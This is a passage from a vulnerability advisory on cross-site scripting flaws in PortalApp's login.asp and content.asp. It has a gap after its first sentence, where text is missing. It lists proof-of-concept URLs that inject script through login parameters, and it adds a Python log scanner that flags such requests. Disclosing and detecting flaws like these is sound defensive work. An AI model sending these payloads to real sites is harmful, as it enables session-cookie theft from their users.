High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in PortalApp which could be exploited to perform cross-site scripting attacks.
s browser in context of the vulnerable website.

Exploitation examples:

http://host/login.asp?user_name=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&password=&ret_page=
http://host/login.asp?user_name=&password=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&ret_page=
http://host/login.asp?user_name=&password=&ret_page=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://host/login.asp?email=sd%40sd.df%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&search_btn=SEND&action=lookup&do_search=1

1.2 The vulnerability exists due to an input sanitization error in the "keywords" parameter in content.asp. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
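
For triage, the following added example (not part of the original advisory and not PortalApp code) scans web server access log lines for requests that carry angle brackets in the parameters named above. The log lines, client addresses and the function names are constructed for illustration, and the check is a heuristic that matches the markup used in the advisory's examples.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script name -> parameters the advisory reports as reflected unsanitized.
AFFECTED = {
    "login.asp": {"user_name", "password", "ret_page", "email"},
    "content.asp": {"keywords"},
}
ANGLE = re.compile(r"[<>]")  # tag delimiters, as in the advisory's examples
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return sorted affected parameter names whose decoded value has < or >."""
    parts = urlsplit(target)
    # Match on the script name only: the install directory varies per site.
    script = parts.path.lower().rsplit("/", 1)[-1]
    watched = AFFECTED.get(script, set())
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; unquote again to catch double-encoded values.
        if name.lower() in watched and ANGLE.search(unquote(value)):
            hits.add(name.lower())
    return sorted(hits)

def scan(lines):
    """Return (client, params) for each log line with a suspicious request."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if match:
            params = suspicious_params(match.group(1))
            if params:
                findings.append((line.split()[0], params))
    return findings

# Constructed sample log lines (documentation address range, invented times).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /login.asp?user_name='
    'alice&password=&ret_page=default.asp HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:02:11 +0000] "GET /portal/login.asp?'
    'user_name=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E'
    '&password=&ret_page= HTTP/1.1" 200 530',
    '192.0.2.44 - - [01/Jan/2024:10:02:40 +0000] "GET /content.asp?keywords='
    '%253Cscript%253E HTTP/1.1" 200 700',
    '192.0.2.77 - - [01/Jan/2024:10:05:03 +0000] "GET /content.asp?keywords='
    'asp+hosting HTTP/1.1" 200 650',
]

if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(client, params)
```

Hits only show that a request was made; whether the value was reflected unencoded has to be confirmed against the deployed version of the application.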